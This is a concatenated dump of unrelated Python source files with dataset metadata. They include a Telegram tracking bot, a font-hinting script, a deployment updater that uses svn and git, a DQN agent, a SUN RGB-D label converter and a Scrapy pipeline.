field=models.CharField(default=b'Oncology Research', max_length=45, verbose_name=b'Organization', blank=True),\n ),\n ]\n","sub_path":"virtual_miseq/migrations/0004_auto_20150831_1639.py","file_name":"0004_auto_20150831_1639.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"653088267","text":"# -*- coding: utf-8 -*-\nfrom config import *\nimport methods\nfrom telebot import types\nimport string\n\n@bot.message_handler(commands=['start'])\ndef start_message(message):\n methods.start_menu(message)\n\n\ndef track_delivery(track_id):\n if True in list(map(lambda x: x not in string.digits, track_id.text)):\n keyboard = types.InlineKeyboardMarkup()\n callback_button = types.InlineKeyboardButton(text=\"Повторить\", callback_data=\"track\")\n main_menu = types.InlineKeyboardButton(text=\"Главное меню\", callback_data=\"home\")\n keyboard.add(main_menu)\n keyboard.add(callback_button)\n bot.send_message(track_id.chat.id, \"Некорректно введен номер накладной\", reply_markup=keyboard)\n\n else:\n track_result = methods.get_track_delivery(track_id)\n if not track_result:\n keyboard = types.InlineKeyboardMarkup()\n callback_button = types.InlineKeyboardButton(text=\"Повторить\", callback_data=\"track\")\n keyboard.add(callback_button)\n bot.send_message(track_id.chat.id, \"Номер накладной не найден\", reply_markup=keyboard)\n else:\n send_message = track_result['title'][0]+':'+track_result['title'][1]+'\\n\\n'+track_result['route'][0]+' '+track_result['route'][1]+'\\n'+track_result['location'][0]+' '+\\\n track_result['location'][1]+'\\n'+track_result['address'][0]+' '+track_result['address'][1]+'\\n'\\\n +track_result['information'][0] + ' ' + track_result['information'][1]\n bot.send_message(track_id.chat.id, send_message)\n\n\n@bot.callback_query_handler(func=lambda call: True)\ndef callback_inline(call):\n if call.message:\n if call.data == 'track':\n sent = bot.send_message(call.message.chat.id, 'Введите код')\n bot.register_next_step_handler(sent, track_delivery)\n if call.data == 'home':\n methods.start_menu(call.message)\n\nif __name__ == '__main__':\n bot.polling(none_stop=True)","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"300271446","text":"#MenuTitle: New Tab with Glyphs Exceeding Zones\n# -*- coding: utf-8 -*-\nfrom __future__ import division, print_function, unicode_literals\n__doc__=\"\"\"\nOpens a new tab with all glyphs where the extremums do not lie within zones.\n\"\"\"\n\nthisFont = Glyphs.font # frontmost font\nthisFontMaster = thisFont.selectedFontMaster # active master\nthisFontMasterID = thisFontMaster.id\nlistOfSelectedLayers = thisFont.selectedLayers # active layers of selected glyphs\n\ndef zoneList( master ):\n\tzoneList = []\n\tfor z in master.alignmentZones:\n\t\tzoneOrigin, zoneSize = int(z.position), int(z.size)\n\t\tzoneList.append( ( zoneOrigin, zoneOrigin+zoneSize ) )\n\treturn zoneList\n\ndef isInZones( thisLayer, zones ):\n\t# ignore empty glyphs:\n\tif len(thisLayer.paths) == 0 and len(thisLayer.components) == 0:\n\t\treturn True\n\t\n\tbottom = thisLayer.bounds.origin.y\n\ttop = bottom + thisLayer.bounds.size.height\n\t\n\tisBottomInZone = False\n\tisTopInZone = False\n\t\n\tfor thisZone in zones:\n\t\tzoneOrigin, zoneEnd = thisZone[0], thisZone[1]\n\t\t\n\t\tif zoneOrigin < zoneEnd:\n\t\t\t# top zone\n\t\t\tif zoneOrigin <= top <= zoneEnd:\n\t\t\t\tisTopInZone = True\n\t\t\t\t\n\t\telif zoneOrigin > zoneEnd:\n\t\t\t# bottom zone\n\t\t\tif zoneOrigin >= bottom >= zoneEnd:\n\t\t\t\tisBottomInZone = True\n\t\n\tif isBottomInZone and isTopInZone:\n\t\treturn True\n\telse:\n\t\treturn False\n\ntabString = \"\"\nmasterZones = zoneList( thisFontMaster )\nfor thisGlyph in thisFont.glyphs:\n\tthisLayer = thisGlyph.layers[thisFontMasterID]\n\tif not isInZones( thisLayer, masterZones ):\n\t\ttabString += \"/%s\" % thisGlyph.name\n\n# opens new Edit tab:\nfrom PyObjCTools.AppHelper import callAfter\ncallAfter( Glyphs.currentDocument.windowController().addTabWithString_, tabString )\n","sub_path":"Hinting/New Tab with Glyphs Exceeding Zones.py","file_name":"New Tab with Glyphs Exceeding Zones.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"28460227","text":"import urllib.request\r\nimport os\r\n\r\n\r\ndef download(url, name):\r\n if not os.path.exists('Music'):\r\n os.system('mkdir Music')\r\n \r\n path = 'Music/' + name + '.mp3'\r\n\r\n if not os.path.exists(path):\r\n try:\r\n urllib.request.urlretrieve(url, path)\r\n except AttributeError:\r\n name = str(hash(url))\r\n path = 'Music/' + name + '.mp3'\r\n urllib.request.urlretrieve(url, path)\r\n print('OK')\r\n\r\n return path\r\n\r\nimport json, requests\r\n\r\nclass VK_lib:\r\n \r\n def get_name(id=463892171):\r\n s = requests.post(\"https://vrit.me/action.php\",data={\r\n \"method\": \"audio.get\",\r\n \"count\": 1000000000,\r\n \"offset\": 0,\r\n \"user_id\": id})\r\n\r\n s = json.loads(s.text)\r\n return s['title']\r\n\r\n def get_count(self, id=463892171):\r\n s = requests.post(\"https://vrit.me/action.php\",data={\r\n \"method\": \"audio.get\",\r\n \"count\": 1000000000,\r\n \"offset\": 0,\r\n \"user_id\": id})\r\n\r\n s = json.loads(s.text)\r\n\r\n return s['count']\r\n\r\n def get_dict(id=463892171):\r\n s = requests.post(\"https://vrit.me/action.php\",data={\r\n \"method\": \"audio.get\",\r\n \"count\": 1000000000,\r\n \"offset\": 0,\r\n \"user_id\": id})\r\n\r\n s = json.loads(s.text)\r\n music = dict()\r\n ms = s['html'].split('\\n')\r\n n_ms = list()\r\n while ms:\r\n if len(ms) >= 13:\r\n n_ms.append(ms[:13])\r\n ms = ms[13:]\r\n error_url = 0\r\n for n, i in enumerate(n_ms):\r\n composition = dict()\r\n composition['artist'] = i[11].strip().split('
')[1].split('<')[0]\r\n composition['name'] = i[10].strip().split('
')[1].split('<')[0]\r\n composition['image'] = i[1].strip().split('url(')[1].split(\"'\")[1]\r\n if composition['image'][:8] != 'https://':\r\n composition['image'] = 'None'\r\n composition['long'] = i[9].strip().split('
')[1].split('<')[0]\r\n composition['url'] = i[2].strip().split('
\\033[0m\").strip()\n if not inp_env:continue\n elif inp_env == 'Q' or inp_env == 'q':\n exit(\"\\033[1;31mBye\\033[0m\")\n elif inp_env.isdigit() and choice_env.has_key(inp_env):\n env = choice_env[inp_env]\n current_dir = '%s/%s' % (app_dir, env)\n os.chdir(current_dir)\n print('\\033[1;31m当前路径: %s\\033[0m' % os.getcwd())\n\n print(\"\\033[1;31m当前项目列表:\\033[0m\")\n for k, v in choice_app.items():\n print('\\033[1;32m %s %s\\033[0m' % (k, v))\n \n flag = False\n while not flag:\n inp_app = raw_input(\"\\033[1;32m选择更新项目 >\\033[0m\").strip()\n if not inp_app:continue\n elif inp_app == 'Q' or inp_app == 'q':\n exit(\"\\033[1;31mBye\\033[0m\")\n elif inp_app == 'B' or inp_app == 'b':\n flag = True\n elif inp_app.isdigit() and choice_app.has_key(inp_app):\n # 删除目录\n app = choice_app[inp_app]\n cmds('rm',' -rf %s %s_dependency.xml'%(app,app))\n time.sleep(1)\n print('\\033[1;31m删除 %s %s_dependency.xml 【完成】\\033[0m'%(app,app))\n \n inp_svn_url = raw_input(\"\\033[1;32m输入 svn url >\\033[0m\").strip()\n \n # svn 下载升级包\n svn_url = ' export https://192.168.24.250/svn/yjb/trunks/10%%20Release/%s' %inp_svn_url\n cmds('svn',svn_url)\n time.sleep(1)\n print('\\033[1;31msvn %s 【完成】\\033[0m' % (svn_url))\n \n # 解压升级包\n svn_patch = inp_svn_url.split('/')[-1]\n cmds('unzip',' %s'%svn_patch)\n time.sleep(1)\n print('\\033[1;31m解压升级包 %s 【完成】\\033[0m' % (svn_patch))\n \n # 本次升级文件移至当前目录\n pags_path = subprocess.Popen('find' + ' ./ -name %s '%app, shell=True, stdout=subprocess.PIPE).stdout.read().decode(\n 'utf-8')\n pags = pags_path.strip('\\n')\n cmds('mv',' %s* .'%pags)\n\n print('\\033[1;31m移动升级包 %s 【完成】\\033[0m' % (pags))\n \n # 删除本次升级包\n pags_dir = svn_patch.split('.zip')[0]\n cmds('rm',' -rf %s*'%pags_dir)\n print('\\033[1;31m删除升级包 %s 【完成】\\033[0m' % (pags_dir))\n \n # 刷新升级文件\n os.chdir(app_dir) # 切换到项目根目录\n print('\\033[1;31m当前路径: %s\\033[0m' % os.getcwd())\n cmds('bash',' stages/trade3-download.sh %s'%env)\n print('\\033[1;31mbash stages/trade3-download.sh %s 【完成】\\033[0m' % (env))\n\n # 更新readme\n changlog = 'svn:%s user:%s time:%s'%(svn_patch,user,current_time)\n mem_data = file_to_mem(readme_file)\n mem_data.append(changlog)\n mem_to_file(mem_data, readme_file)\n print('\\033[1;31m添加README %s 【完成】\\033[0m' % changlog) \n \n # 提交到 git\n git_repo.gitadd() # git add -A ./\n time.sleep(1)\n git_repo.gitcommit(changlog) # git commit -m \"xx\"\n time.sleep(1)\n git_repo.gitpush() # git push\n time.sleep(1)\n \n \n exit(\"\\033[1;32m升级成功\\033[0m\")\n \n else:\n print(\"\\033[1;31m项目不存在,请重新选择\\033[0m\")\n \n \n else:\n print(\"\\033[1;31m环境不存在,请重新选择\\033[0m\")\n \n","sub_path":"GJZQ/updateh5.py","file_name":"updateh5.py","file_ext":"py","file_size_in_byte":7991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"274599800","text":"import smtplib\nimport os\nfrom constants import *\n\n\ndef send_message(toaddrs, message, subject):\n server = smtplib.SMTP(EMAIL_SERVER, EMAIL_SERVER_PORT)\n server.starttls()\n server.login(EMAIL_USERNAME, EMAIL_PASSWORD)\n formatted_message = ('From: %s\\r\\n' % EMAIL_USERNAME\n + 'To: %s\\r\\n' % MAILING_LIST_NAME\n + 'Subject: ' + subject + '\\r\\n\\n'\n + message)\n server.sendmail(from_addr=EMAIL_USERNAME, to_addrs=toaddrs, msg=formatted_message)\n server.quit()\n\n\ndef valid_phone_number(phone_number):\n nums = '0123456789'\n if len(phone_number) != 10:\n print('invalid length: {}'.format(len(phone_number)))\n return False\n for num in phone_number:\n if num not in nums:\n print('Invalid num: {}'.format(num))\n return False\n return True;\n\n\ndef phone_provider_to_address(phone_number, provider):\n if valid_phone_number(phone_number) and provider in PROVIDER_TO_EMAIL:\n return phone_number + PROVIDER_TO_EMAIL['provider']\n\n\ndef send_to_subscribers(message, subject):\n assert (os.path.exists(ADDRESSES_FILE))\n with open(ADDRESSES_FILE) as addr_file:\n toaddrs = [addr for addr in addr_file]\n send_message(toaddrs, message, subject)\n","sub_path":"emailer.py","file_name":"emailer.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"195540951","text":"from .replaybuffer import *\nfrom .model import *\nimport numpy as np\nimport torch\nimport torch.optim as optim\nimport torch.nn.functional as F\n\n\nclass DqnAgent:\n def __init__(self, update_type=\"soft\", state_size=37, action_size=4, hidden_sizes=[64, 32],\n learn_every=3, transfer_every=5, lr=5e-4, double_dqn=False):\n \"\"\"\n :param update_type: {'soft', 'hard'} hard update copies the local weights fully to the target weights\n :param state_size: state size of the env\n :param action_size: action size of the env\n :param hidden_sizes: list mirroring the neural network architecture of the agent\n :param learn_every: freqency of learning. higher int = longer to learn\n :param transfer_every: frequency of network weights transfer from local to the target. affects learning.\n :param lr: learning rate of the network optimizer\n :param double_dqn: boolean to use double dqn or not\n \"\"\"\n\n self.double_dqn = double_dqn\n\n self.device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n self.state_size = state_size\n self.action_size = action_size\n\n # Build our local and target networks\n network_sizes = []\n network_sizes.append(state_size)\n network_sizes.extend(hidden_sizes)\n network_sizes.append(action_size)\n self.local_network = Q_Network(network_sizes).to(self.device)\n self.target_network = Q_Network(network_sizes).to(self.device)\n\n self.optimizer = optim.Adam(self.local_network.parameters(), lr=lr)\n\n # Init memory and size of sample taken randomly from it\n self.memory = ReplayBuffer(device=self.device)\n self.LEARNING_SAMPLE_SIZE = 10\n\n # Set learning and transfer update cycles and counters\n self.learn_every = learn_every\n self.transfer_every = transfer_every\n self.learn_counter = 0\n self.transfer_counter = 0\n\n # set the kind of transfer to be used\n self.update_type = update_type # {\"soft\",\"hard\"}\n # set transfer rate for soft-transfer\n self.TAU = 1e-3\n\n # set `concentration` of next target's Q-value to learn\n self.GAMMA = 0.99\n\n def step(self, state, action, reward, next_state, done):\n # keep in our reply buffer at every step\n self.memory.add(state, action, reward, next_state, done)\n\n # sample some experiences and learn every update step\n self.learn_counter = (self.learn_counter + 1) % self.learn_every\n if self.learn_counter == 0 and self.memory.size() >= self.LEARNING_SAMPLE_SIZE:\n sampled_experiences = self.memory.sample(self.LEARNING_SAMPLE_SIZE)\n self._learn(sampled_experiences)\n\n # after some time, transfer the weights from the Q-network to the Q-target\n self.transfer_counter = (self.transfer_counter + 1) % self.transfer_every\n if self.transfer_counter == 0:\n self._commit_learning()\n\n def act(self, state, eps):\n state = torch.from_numpy(state).float().unsqueeze(0).to(self.device)\n\n # turn off network learning mode\n self.local_network.eval()\n\n # temporarily set requires_grad flag to false\n with torch.no_grad():\n action_values = self.local_network(state)\n action = self._choose_action(action_values, eps)\n\n # set network back to learning mode\n self.local_network.train()\n\n return action\n\n def _choose_action(self, action_values, eps):\n # Epsilon-greedy action selection\n if random.random() > eps:\n # print(\"taking network action\")\n return np.argmax(action_values.cpu().data.numpy())\n else:\n # print(\"taking random action\")\n return random.choice(np.arange(self.action_size))\n\n def _learn(self, experiences):\n states, actions, rewards, next_states, dones = experiences\n\n if self.double_dqn:\n best_actions = self.local_network(next_states).detach().argmax(1).unsqueeze(1)\n # get actual Q-value from the actions taken\n Q_next_targets = self.target_network(next_states).detach().gather(1, best_actions)\n else:\n Q_next_targets = self.target_network(next_states).detach().max(1)[0].unsqueeze(1)\n\n Q_targets = rewards + (self.GAMMA * Q_next_targets * (1-dones))\n Q_actual = self.local_network(states).gather(1, actions)\n\n # calculate the loss\n loss = F.mse_loss(Q_actual, Q_targets)\n\n # minimize loss\n self.optimizer.zero_grad()\n loss.backward()\n\n # register the gradients\n self.optimizer.step()\n\n def _commit_learning(self):\n for target_param, local_param in zip(self.target_network.parameters(), self.local_network.parameters()):\n if self.update_type == \"soft\":\n target_param.data.copy_((1.0-self.TAU)*target_param.data + self.TAU*local_param.data)\n if self.update_type == \"hard\":\n target_param.data.copy_(local_param.data)\n","sub_path":"src/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":5084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"106485294","text":"# coding=utf-8\r\n# 3.31作业 - 敏感词2.py\r\n# 2019/4/3 12:28\r\ndef change():\r\n b = input(\"请输入信息:\")\r\n for w in open('word.txt',encoding='utf-8'):\r\n nw = w.rstrip()\r\n if nw in b:\r\n nw_len = len(nw)\r\n b = b.replace(nw,'*'*nw_len)\r\n\r\n else:\r\n print(b)\r\nchange()\r\n\r\nfrom sys import argv # 接受命令行传进来的参数\r\n# 1.先将txt文件中的内容存到一个列表里\r\n\r\n\r\ndef fun1():\r\n words = [] # 这里定义一个空列表盛装敏感词\r\n f = open('word.txt',encoding='utf-8') # 打开文件\r\n for word in f: # 遍历文件中的词汇\r\n words.append(word[:-1]) # 将敏感词汇添加到空列表中\r\n f.close()\r\n return words # 返回列表words\r\n\r\n\r\n# 2.判断输入的内容是否包含在列表里\r\ndef fun2(words, b):\r\n \"\"\"\r\n\r\n :param words: 之前盛装敏感词的列表\r\n :param b: 用户输入的信息\r\n :return:\r\n \"\"\"\r\n b = input(\"请输入信息:\") # 获取用户输入\r\n for w in words:\r\n if w == b: # 判断用户输入是否包含在列表内\r\n print(\"freedom\")\r\n change()\r\n print(\"Human Rights\")\r\n return\r\nfun2(fun1(),input)\r\n","sub_path":"0331/3.31作业cc/敏感词2.py","file_name":"敏感词2.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"34270124","text":"from scipy import io\nfrom matplotlib import pyplot\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom numpy import matlib\nimport numpy as np\nimport cv2\nimport math\nimport sys\nimport os\n# np.set_printoptions(threshold=sys.maxsize)\n\ndef flip_towards_viewer(normals, points):\n mat = np.matlib.repmat(np.sqrt(np.sum(points*points, 1)), 3, 1)\n points = points / mat\n # print(points)\n proj = np.sum(points * normals, 1)\n flip = proj > 0\n normals[flip, :] = -normals[flip, :]\n return normals\n\n\ndef make_kitti_calib (mat_file):\n for range_index in range(4) :\n data = mat_file.popitem()\n if(data[0] == 'SUNRGBDMeta'):\n image_index = 31\n # (1) rgbpath를 보기 위해서\n path = data[1][0][image_index][5][0]\n print(path)\n for i in range(10335):\n # for j in range(13):\n #\n # \"\"\" data[1][0][image_index][index]\n # 0. sequenceName (string)\n # 1. groundtruth3DBB (9 element struct)\n # 2. Rtilt (3x3 double)\n # 3. K (3x3 double)\n # 4. depthpath (string)\n # 5. rgbpath (string)\n # 6. anno_extrinsics (3x3 double)\n # 7. depthname (string)\n # 8. rgbname (string)\n # 9. sensorType (string : kv1 / kv2 / realsense / xtion)\n # 10. valid (전부 1.)\n # 11. gtCorner3D (3xN double, 없는것도 있음)\n # 12. groundtruth2DBB (4 element struct)\n # \"\"\"\n #list = []\n K = np.array(data[1][0][i][3])\n new_K = np.zeros((K.shape[0],K.shape[1]+1))\n new_K[:,:-1] = K #(3,3)은 원래데이터\n\n\n #list.extend(new_K.reshape(-1))\n list = new_K.reshape(-1).tolist()\n img_path = data[1][0][i][5]\n f = open('../data/SUNRGBD/calib/'+str(img_path).split('/')[-1].split('.')[0]+'.txt', 'w')\n f.write(str(list[:]))\n #del list[:] #리스트 내 원소들만 지워주기\n list.clear()\n depth_raw = cv2.imread(data[1][0][image_index][4][0], -1) #depth 값을 받아옴 (1개)\n depthInpaint = (depth_raw>>3) | (depth_raw<<(16-3))\n depthInpaint = depthInpaint.astype(\"float32\")\n depthInpaint = depthInpaint / 1000\n color_raw = cv2.imread(data[1][0][image_index][5][0], cv2.COLOR_RGB2BGR) # mat형태로 imag 값을 받아옴\n rgb = np.reshape(color_raw, (len(color_raw) * len(color_raw[0]), 3))\n rgb = rgb.astype(\"float32\")\n rgb = rgb / 255\n K = data[1][0][image_index][3]\n cx = K[0][2]\n cy = K[1][2]\n fx = K[0][0]\n fy = K[1][1]\n\n range_x = np.arange(1, len(depth_raw[0])+1)\n range_y = np.arange(1, len(depth_raw)+1)\n\n x, y = np.meshgrid(range_x, range_y)\n\n x3 = (x-cx)*depthInpaint*1/fx\n y3 = (y-cy)*depthInpaint*1/fy\n z3 = depthInpaint\n\n x3 = np.reshape(x3, len(x3)*len(x3[0]))\n y3 = np.reshape(y3, len(y3)*len(y3[0]))\n z3 = np.reshape(z3, len(z3)*len(z3[0]))\n #pointsMat = np.vstack((x3,-y3,z3))\n pointsMat = np.vstack((x3,z3,-y3))\n # # remove nan\n nan_index = []\n for i in range(len(x3)):\n # if x3[i] != 0 or y3[i] != 0 or z3[i] != 0:\n if x3[i] == 0 and y3[i] == 0 and z3[i] == 0:\n nan_index.append(i)\n pass\n pass\n pointsMat = np.delete(pointsMat, nan_index, axis=1)\n rgb = np.delete(rgb, nan_index, axis=0)\n Rtilt = data[1][0][image_index][2]\n point3d = Rtilt @ pointsMat\n \"\"\"\n Random sampling.\n 260631 --> 10000.\n \"\"\"\n sample_size = np.random.randint(len(point3d[0]), size=10000)\n x3 = point3d[0, sample_size]\n y3 = point3d[2, sample_size]\n z3 = point3d[1, sample_size]\n rgb = rgb[sample_size, :]\n \"\"\"\n Visualize\n \"\"\"\n label_lists = []\n for groundtruth3DBB in data[1][0][image_index][1]:\n #한 이미지에 들어있는 물체의 갯수만큼 반복문이 실행됨\n for items in groundtruth3DBB:\n #label_list = []\n\n \"\"\"\n items = data[1][0][image_index][1][(groundtruth3DBB)]\n items[index]\n 0. basis (3x3 double)\n 1. coeffs (1x3 double)\n 2. centroid (1x3 double)\n 3. classname (string) #label_name\n 4. labelname (?)\n 5. sequenceName (string)\n 6. orientation (1x3 double)\n 7. gtBb2D (1x4 double)\n 8. label ()\n \"\"\"\n\n corners = np.zeros((8,3))\n basis_ori = items[0]\n\n label = items[3][0]\n print(\"label : \" , label)\n inds = np.argsort(-abs(items[0][:, 0]))\n\n basis = items[0][inds, :]\n coeffs = items[1][0, inds]\n\n inds = np.argsort(-abs(basis[1:, 1]))\n\n centroid = items[2]\n basis = flip_towards_viewer(basis, np.matlib.repmat(centroid, 3, 1))\n coeffs = abs(coeffs)\n\n orientation = items[6][0]\n\n corners[0, :] = -basis[0, :] * coeffs[0] + basis[1, :] * coeffs[1] + basis[2, :] * coeffs[2]\n corners[1, :] = basis[0, :] * coeffs[0] + basis[1, :] * coeffs[1] + basis[2, :] * coeffs[2]\n corners[2, :] = basis[0, :] * coeffs[0] - basis[1, :] * coeffs[1] + basis[2, :] * coeffs[2]\n corners[3, :] = -basis[0, :] * coeffs[0] - basis[1, :] * coeffs[1] + basis[2, :] * coeffs[2]\n\n\n corners[4, :] = -basis[0, :] * coeffs[0] + basis[1, :] * coeffs[1] - basis[2, :] * coeffs[2]\n corners[5, :] = basis[0, :] * coeffs[0] + basis[1, :] * coeffs[1] - basis[2, :] * coeffs[2]\n corners[6, :] = basis[0, :] * coeffs[0] - basis[1, :] * coeffs[1] - basis[2, :] * coeffs[2]\n corners[7, :] = -basis[0, :] * coeffs[0] - basis[1, :] * coeffs[1] - basis[2, :] * coeffs[2]\n\n corners += np.matlib.repmat(centroid, 8, 1)\n #radian값.\n theta = math.atan2(orientation[1], orientation[0])\n theta_s = str(theta*180.0/math.pi)[:6]\n #degree값\n dtheta = math.degrees(theta)\n #x좌표 : length , y좌표 : width, z좌표 : height\n label_length = corners[1, 0] - corners[0, 0]\n label_width = corners[0, 1] - corners[1, 1]\n label_height = corners[4, 2] - corners[0, 2]\n # label_center_x = sum(corners[1, 0], corners[0, 0]) / 2\n # label_center_y = sum(corners[1, 1], corners[0, 1]) / 2\n # label_center_z = sum(corners[3, 3], corners[0, 0]) / 2\n label_center_x = corners[0, 0] + label_length / 2\n label_center_y = corners[0, 1] - label_width / 2\n label_center_z = corners[0, 2] - label_height / 2\n\n label_list = [label, label_center_x, label_center_y, label_center_z, label_length, label_width, label_height, theta]\n label_lists.append(label_list[:])\n label_list.clear()\n ax.plot([corners[0, 0], corners[1, 0]], [corners[0, 1], corners[1, 1]],\n zs=[corners[0, 2], corners[1, 2]], c='r')\n ax.plot([corners[1, 0], corners[2, 0]], [corners[1, 1], corners[2, 1]],\n zs=[corners[1, 2], corners[2, 2]], c='r')\n ax.plot([corners[2, 0], corners[3, 0]], [corners[2, 1], corners[3, 1]],\n zs=[corners[2, 2], corners[3, 2]], c='r')\n pyplot.show()\n ax.plot([corners[3, 0], corners[0, 0]], [corners[3, 1], corners[0, 1]],\n zs=[corners[3, 2], corners[0, 2]], c='r')\n pyplot.show()\n ax.plot([corners[4, 0], corners[5, 0]], [corners[4, 1], corners[5, 1]],\n zs=[corners[4, 2], corners[5, 2]], c='r')\n ax.plot([corners[5, 0], corners[6, 0]], [corners[5, 1], corners[6, 1]],\n zs=[corners[5, 2], corners[6, 2]], c='r')\n ax.plot([corners[6, 0], corners[7, 0]], [corners[6, 1], corners[7, 1]],\n zs=[corners[6, 2], corners[7, 2]], c='r')\n ax.plot([corners[7, 0], corners[4, 0]], [corners[7, 1], corners[4, 1]],\n zs=[corners[7, 2], corners[4, 2]], c='r')\n\n ax.plot([corners[0, 0], corners[4, 0]], [corners[0, 1], corners[4, 1]],\n zs=[corners[0, 2], corners[4, 2]], c='r')\n ax.plot([corners[1, 0], corners[5, 0]], [corners[1, 1], corners[5, 1]],\n zs=[corners[1, 2], corners[5, 2]], c='r')\n ax.plot([corners[2, 0], corners[6, 0]], [corners[2, 1], corners[6, 1]],\n zs=[corners[2, 2], corners[6, 2]], c='r')\n ax.plot([corners[3, 0], corners[7, 0]], [corners[3, 1], corners[7, 1]],\n zs=[corners[3, 2], corners[7, 2]], c='r')\n\n ax.text3D(corners[0,0], corners[0,1], corners[0,2], label, fontsize=10)\n # ax.text3D(corners[0,0], corners[0,1], corners[0,2], label+\" / \"+theta_s, fontsize=10, color='blue')\n pass\n #label_img_path = data[1][0][i][5]\n #print(label_img_path)\n fp = open('../data/SUNRGBD/label/' + str(img_path).split('/')[-1].split('.')[0] + '.txt', 'w')\n for j in range(len(label_lists)):\n fp.write(str(label_lists[j]) + '\\n')\n fp.close()\n label_lists.clear()\n pass\n\n bgr = np.zeros((len(rgb),3))\n bgr[:,0] = rgb[:,2]\n bgr[:,1] = rgb[:,1]\n bgr[:,2] = rgb[:,0]\n ax.scatter(x3, z3, y3, c=bgr, depthshade=False)\n pyplot.show()\n\n else:\n continue\n pass\n #(2) depth를 m단위로 전환\n\n \"\"\"\n data[1][0][index] --> index 번째 data. ( 0 <= index <= 10335 )\n data[1][0][index][index2] --> index 번째 data의 index2 번째 data. Matlab에서 column에 해당. 13개.\n \"\"\"\n #calib 파일을 이미지 이름으로 만들어주는 상황.\n\n\n\n # #color_raw = (530, 730, 3)\n # color_raw = cv2.imread(data[1][0][image_index][5][0], cv2.COLOR_RGB2BGR) # mat형태로 imag 값을 받아옴\n # #depth_raw = (530, 730)\n #\n # depth_raw = cv2.imread(data[1][0][image_index][4][0], -1) #depth 값을 받아옴 (1개)\n #\n # #\n # # \"\"\"\n # # uint8 color_raw data to float32 range(0,1)\n # # \"\"\"\n # #\n # '''\n # 필요없을 듯\n # rgb = np.reshape(color_raw, (len(color_raw)*len(color_raw[0]), 3))\n # rgb = rgb.astype(\"float32\")\n # rgb = rgb / 255\n # '''\n # #\n # #\n # # \"\"\"\n # # Make 3d point cloud by using depth_raw\n # # \"\"\"\n # #depth를 m단위로 변환해줌\n # # depthInpaint = (530, 730)\n # depthInpaint = (depth_raw>>3) | (depth_raw<<(16-3))\n # depthInpaint = depthInpaint.astype(\"float32\")\n # depthInpaint = depthInpaint / 1000\n # # 8m이상이면 무시\n # # for row in depthInpaint :\n # # for ele in row :\n # # ele = 8 if ele > 8 else ele\n # # pass\n # # pass\n # #이건 카메라 파라미터로,\n # K = data[1][0][image_index][3]\n # cx = K[0][2]\n # cy = K[1][2]\n # fx = K[0][0]\n # fy = K[1][1]\n #\n # range_x = np.arange(1, len(depth_raw[0])+1)\n # range_y = np.arange(1, len(depth_raw)+1)\n #\n # x, y = np.meshgrid(range_x, range_y)\n #\n # x3 = (x-cx)*depthInpaint*1/fx\n # y3 = (y-cy)*depthInpaint*1/fy\n # z3 = depthInpaint\n #\n # x3 = np.reshape(x3, len(x3)*len(x3[0]))\n # y3 = np.reshape(y3, len(y3)*len(y3[0]))\n # z3 = np.reshape(z3, len(z3)*len(z3[0]))\n # #pointsMat = np.vstack((x3,-y3,z3))\n # pointsMat = np.vstack((x3,z3,-y3))\n # #point cloud 그려주기 위해서 (시작)\n # # # remove nan\n # nan_index = []\n # for i in range(len(x3)):\n # # if x3[i] != 0 or y3[i] != 0 or z3[i] != 0:\n # if x3[i] == 0 and y3[i] == 0 and z3[i] == 0:\n # nan_index.append(i)\n # pass\n # pass\n # pointsMat = np.delete(pointsMat, nan_index, axis=1)\n # rgb = np.delete(rgb, nan_index, axis=0)\n #\n # Rtilt = data[1][0][image_index][2]\n # point3d = Rtilt @ pointsMat\n #\n # \"\"\"\n # Random sampling.\n # 260631 --> 10000.\n # \"\"\"\n # sample_size = np.random.randint(len(point3d[0]), size=10000)\n # x3 = point3d[0, sample_size]\n # y3 = point3d[2, sample_size]\n # z3 = point3d[1, sample_size]\n # rgb = rgb[sample_size, :]\n #\n\n\nif __name__ == '__main__':\n fig = pyplot.figure()\n ax = Axes3D(fig)\n\n mat_file = io.loadmat('C:/SUNRGBDMeta/SUNRGBDMeta.mat')\n make_kitti_calib(mat_file)\n","sub_path":"CenterNet-master/SUN_to_KITTI/ReadMAT_WriteFileForKitti.py","file_name":"ReadMAT_WriteFileForKitti.py","file_ext":"py","file_size_in_byte":14917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"249216941","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\nfrom urllib import request\nimport time\nclass QiushispidersPipeline(object):\n def process_item(self, item, spider):\n src = item[\"src\"]\n\n url = \"http:\"+ src\n print(url)\n path = \"D:\\\\img\\\\\"+str(time.time())+\".jpg\"\n try:\n request.urlretrieve(url,path)\n except Exception as e:\n print(e)\n else:\n print(\"正在爬去,请稍等\")\n\n\n return item\n","sub_path":"学神1809/qiushispiders/qiushispiders/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"642276863","text":"#!/usr/bin/env python\n\nfrom I3Tray import *\n\ntray = I3Tray()\n\n\ntray.AddModule(\"BottomlessSource\")\n\n# can't convert that return value to bool or none\ndef f(frame, foo='foo', bar='bar', baz='baz'):\n print(foo, bar, baz)\n assert foo == 'foo', 'foo didnt get set'\n assert bar == 'BARWASSET', 'bar didnt get set'\n assert baz == 'baz', 'baz didnt get set'\n 